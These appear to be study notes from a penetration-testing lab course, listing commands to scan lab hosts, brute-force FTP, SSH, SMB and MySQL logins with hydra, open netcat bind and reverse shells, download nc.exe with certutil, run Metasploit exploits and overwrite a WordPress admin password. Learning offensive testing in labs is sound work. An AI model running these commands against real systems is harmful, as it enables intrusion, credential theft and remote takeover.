Exploitation

- banner grabbing
  - using nmap: nmap -sV --script=banner 192.8.94.3
  - using netcat: nc 192.8.94.3 22

- vulnerability scanning with nmap
  - find open ports, service versions and the OS: nmap -sV -O 192.152.25.3
  - find a cgi script on the apache website, then use nmap to check it for the shellshock vulnerability: nmap -sV -p 80 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.152.25.3

- fixing exploits
  - search with searchsploit: searchsploit HTTP File Server 2.3
  - download the exploit: searchsploit -m 39161
  - modify the exploit to use the correct local ip and port
  - run the script to get a reverse shell

- netcat fundamentals
  - connect to an open port: nc 10.0.27.35 80
  - verbose output and no dns resolution: nc -nv 10.0.27.35 80
  - connect to a udp port: nc -nvu 10.0.27.35 161
  - transfer the netcat binary to a windows system
    - on linux, go to the directory holding the binary: cd /usr/share/windows-binaries
    - on linux, serve it over http: python -m SimpleHTTPServer 80
    - on windows, download it: certutil -urlcache -f http://10.10.31.2/nc.exe nc.exe

- bind shells
  - set up the listener on windows: nc.exe -nvlp 1234 -e cmd.exe
  - connect to it from linux: nc -nv 10.10.31.2 1234

- reverse shells
  - set up the listener on linux: nc -nvlp 1234
  - connect to it from windows: nc.exe -nv 10.10.0.2 1234 -e cmd.exe

- msf
  - exploit processmaker: use exploit/multi/http/processmaker_exec

- windows port scanning and enumeration
  - scan: nmap -sV demo.ine.local
  - check smb: nmap -sV -sC -p 445 demo.ine.local
  - check the smb version (msf): use auxiliary/scanner/smb/smb_version

- targeting microsoft iis ftp
  - scan: nmap -sV -sC -p21,80 demo.ine.local
  - check ftp access: ftp demo.ine.local 21
  - bruteforce ftp: hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt demo.ine.local ftp
  - login again: ftp demo.ine.local 21

- targeting openssh
  - scan: nmap -sV -sC -p 22 demo.ine.local
  - search for exploits: searchsploit OpenSSH 7.1
  - bruteforce ssh: hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt demo.ine.local ssh
  - login: ssh vagrant@demo.ine.local

- targeting smb
  - scan: nmap -sV -sC -p 445 demo.ine.local
  - bruteforce the administrator user: hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt demo.ine.local smb
  - bruteforce the vagrant user: hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt demo.ine.local smb
  - enum4linux to check other users: enum4linux -u vagrant -p vagrant -U demo.ine.local
  - impacket remote login: python3 psexec.py Administrator@demo.ine.local
  - msf remote login: use exploit/windows/smb/psexec
    - set the payload: set payload windows/x64/meterpreter/reverse_tcp

- targeting mysql database server
  - scan: nmap -sV -sC -p 3306 demo.ine.local
  - find exploits: searchsploit MySQL 5.5
  - bruteforce with msf: use auxiliary/scanner/mysql/mysql_login
    - set the password list: set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
  - login to the sql server: mysql -u root -p -h demo.ine.local
  - sql commands: show databases; use wordpress; show tables; select * from wp_users;
  - exploit the wordpress database by changing the admin password: UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';

- linux port scanning and enumeration
  - scan ports: nmap -sV -p1-10000 10.0.20.13
  - use netcat to grab banners from unknown services
  - nc -nv 10.0.20.13 1524 gives a shell
  - port 80 is a webdav server

- targeting vsftpd
  - scan: nmap -sV -sC -p 21 demo.ine.local
  - check anonymous login: ftp demo.ine.local 21
  - search with searchsploit: searchsploit vsftpd
  - metasploit doesn't work, ftp is patched: use exploit/unix/ftp/vsftpd_234_backdoor
  - ftp bruteforce: hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local ftp
  - login again: ftp demo.ine.local 21

- targeting php
  - scan apache: nmap -sV -sC -p 80 demo.ine.local, then check the phpinfo.php file
  - search with searchsploit: searchsploit php cgi
  - msf module: use exploit/multi/http/php_cgi_arg_injection

- targeting samba
  - scan: nmap -sV -p 445 demo.ine.local
  - check the version (msf): use auxiliary/scanner/smb/smb_version
  - search for exploits: searchsploit samba 3.0.20
  - use the exploit: use exploit/multi/samba/usermap_script